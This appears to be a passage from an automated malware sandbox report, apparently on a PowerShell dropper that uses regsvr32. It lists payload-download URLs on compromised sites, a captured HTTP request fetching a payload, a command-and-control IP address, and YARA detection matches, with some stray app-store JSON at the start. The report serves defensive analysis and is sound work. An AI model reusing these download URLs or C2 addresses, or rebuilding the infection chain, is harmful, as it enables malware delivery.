music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-04-21T14:07:02.1326283Z||.||f28b89c1-eba5-4d1c-9897-a92fbb0d304e||1152921505694753097||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | String found in binary or memory: http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/
Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | String found in binary or memory: http://colegiounamuno.es/cgi-bin/E/
Source: powershell.exe, 00000000.00000002.316606158.000002C338E36000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.304534262.000002A12F09E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.518526373.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.519238319.000001ED94287000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.446318004.00000278A4500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000011.00000002.519238319.000001ED94287000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.446199582.00000278A3CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000008.00000002.518616586.0000000001442000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.518573062.000000000142A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.347575209.0000000001441000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.8.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000008.00000003.347312100.0000000003661000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?33795ada93a40
Source: regsvr32.exe, 00000008.00000002.518573062.000000000142A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabK4$
Source: regsvr32.exe, 00000008.00000002.518430130.00000000013EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?33795ada93
Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | String found in binary or memory: http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/
Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | String found in binary or memory: http://filmmogzivota.rs/SpryAssets/gDR/
Source: powershell.exe, 00000002.00000002.301171990.000002A117825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.301217804.000002A11783A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://focusmedica.in
Source: powershell.exe, 00000002.00000002.301252528.000002A117843000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://focusmedica.in/
Source: powershell.exe, 00000000.00000002.313413338.000002C321929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://focusmedica.in/fmlib/IxB
Source: powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | String found in binary or memory: http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/
Source: powershell.exe, 00000002.00000002.301171990.000002A117825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://focusmedica.inx
Source: svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: powershell.exe, 00000000.00000002.314787403.000002C330D50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.309161023.000002C320CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.296032360.000002A116C21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000000B.00000002.325666258.0000018977C13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://138.201.142.73/%
Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://138.201.142.73/q
Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.518396758.00000000013D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://138.201.142.73:8080/DzjyrxpicabQcrITClZT
Source: regsvr32.exe, 00000008.00000002.518396758.00000000013D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://138.201.142.73:8080/DzjyrxpicabQcrITClZTs
Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.313413338.000002C321929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://creemo.pl/wp-admin/Z
Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.dr | String found in binary or memory: https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
Source: svchost.exe, 0000000B.00000003.322793678.0000018977C5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.322760702.0000018977C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.328487102.0000018977C6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327141707.0000018977C42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323195530.0000018977C41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327141707.0000018977C42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323195530.0000018977C41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000B.00000003.322793678.0000018977C5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.301712766.000002A117962000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.314787403.000002C330D50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.325666258.0000018977C13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.326048817.0000018977C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323148198.0000018977C47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327924238.0000018977C4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 00000014.00000003.426094048.00000278A459B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.426121984.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.427531416.00000278A4588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | DNS traffic detected: queries for: focusmedica.in
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE3438 InternetReadFile,8_2_02CE3438
Source: global traffic | HTTP traffic detected:
    GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: focusmedica.in
    Connection: Keep-Alive
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F988 GetKeyState,GetKeyState,GetKeyState,SendMessageA,6_2_000000018000F988

E-Banking Fraud

Source: Yara match | File source: 8.2.regsvr32.exe.2c90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.regsvr32.exe.2c90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.1380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.296664424.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.518667146.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Process Memory Space: powershell.exe PID: 6424, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtq
Source: Process Memory Space: powershell.exe PID: 6424, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 6424, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\Atpvfjzdexae\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFC0111056F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFC011107CD
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00000001800038E0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018002D934
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180025A20
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018002C240
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180029A44
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180029270
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180027A8C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180011AFC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180021B10
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018002CB3C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018000EDF0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180028614
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018002264C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180027728
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_011F0000
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BC108
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B2100
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D39AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B4DFC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C2C78
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CA46C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CD8E8
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BB728
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B4788
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B3A18
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D5534
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CBD1C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D4508
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CAD54
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B6D50
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C9544
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B59B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B8DB4
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BD9A8
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CA1A0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C49A0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BDD80
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C0DE8
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BB1E0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CFDDC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B89D8
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B75DC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C3438
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D5028
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B1820
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C9C10
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C4410
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BA014
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CC860
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D1460
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D005C
